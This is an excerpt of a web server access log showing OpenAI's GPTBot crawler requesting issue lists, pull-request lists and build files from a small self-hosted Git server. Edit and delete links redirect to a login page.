"https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:38:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:38:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:19:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:19:38:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:19:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:19:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 962] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:38:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:38:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:19:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:19:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" [Client 74.7.227.38] [Length 11283] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 30117] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:19:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11211] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:19:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11212] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:19:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11215] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:19:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9944] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:38:37 +0000] - 200 